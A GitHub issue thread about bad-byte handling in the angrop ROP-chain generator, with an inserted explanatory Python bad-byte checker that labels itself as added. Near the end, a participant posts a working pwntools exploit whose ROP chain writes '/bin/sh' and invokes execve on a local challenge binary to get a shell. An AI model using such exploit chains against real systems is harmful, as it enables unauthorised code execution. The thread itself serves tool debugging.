Closed redfast00 closed 2 years ago
`rop.set_regs(eax=0).payload_str()` also includes the bad bytes. Maybe there is no constraint added for the values on the stack that will be popped?
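A quick way to confirm the symptom described above, added here as an example and not part of angrop or of the original report: scan the emitted payload for bad bytes and report which chain word each hit sits in, so a chain whose gadget addresses are clean but whose popped stack values are not shows up as a word-level hit rather than a bare byte offset. The chain words and the bad-byte set below are constructed for the example; `find_bad_bytes`, `bad_words` and `build_chain` are names chosen here.

```python
import struct

def find_bad_bytes(payload: bytes, badbytes: bytes):
    """Return (offset, byte) for every byte of payload that is in badbytes."""
    return [(off, b) for off, b in enumerate(payload) if b in badbytes]

def bad_words(payload: bytes, badbytes: bytes, word_size: int = 4):
    """Group hits by chain word: {word_index: (word_value, [byte positions])}.
    Assumes little-endian words of word_size bytes (x86-32 here), so a hit in
    a word that a gadget pops is as visible as a hit in a gadget address."""
    hits = {}
    for off, _ in find_bad_bytes(payload, badbytes):
        idx = off // word_size
        word = payload[idx * word_size:(idx + 1) * word_size]
        value = int.from_bytes(word, "little")
        hits.setdefault(idx, (value, []))[1].append(off % word_size)
    return hits

def build_chain(words):
    """Pack 32-bit little-endian words, the same layout p32() produces."""
    return b"".join(struct.pack("<I", w) for w in words)

# Constructed chain: [gadget address, value popped by that gadget, gadget address].
# Both gadget addresses avoid the bad bytes; the popped value does not.
CHAIN = build_chain([0x08041234, 0x0A0B0C0D, 0x08045678])
BADBYTES = b"\x00\x0a"

if __name__ == "__main__":
    for idx, (value, positions) in bad_words(CHAIN, BADBYTES).items():
        print(f"word {idx} = {value:#010x} has bad bytes at positions {positions}")
```

Running it on the constructed chain reports word 1 only, which is exactly the case the report describes: the constraint is satisfied for the gadget addresses and violated by a value the chain pops off the stack.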
This issue has been marked as stale
because it has no recent activity. Please comment or add the pinned
tag to prevent this issue from being closed.
is this issue fixed?
I think I refactored angrop's badbyte handling mechanism once and it should be fixed. Do you think you can still find the binary and share it here so that we can make sure it is actually fixed? @redfast00
^ that happened in early 2021 iirc
I have used angrop to generate a working ropchain using your script. The exploitation script is this:
```python
from pwn import *
chain = b""
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0x6e69622f)
chain += p32(0x80d9f51)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0xff68732f)
chain += p32(0x80d9f55)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806274c) # lea esi, [esi]; xor eax, eax; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x80da008)
chain += p32(0x8066d62) # mov byte ptr [edx], al; mov eax, edx; ret
chain += p32(0x8092016) # mov eax, 8; pop edi; ret
chain += p32(0xf5f5f5f5)
chain += p32(0x8092d7b) # mov edi, 0; add eax, 3; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x8048008)
chain += p32(0x806ef52) # pop ecx; pop ebx; ret
chain += p32(0x8048008)
chain += p32(0x80da001)
chain += p32(0x806f860) # int 0x80
#r = gdb.debug("./bronze_ropchain")
r = process("./bronze_ropchain")
r.sendlineafter(b"name?", b'A'*28+chain)
r.interactive()
```
the patch is pending.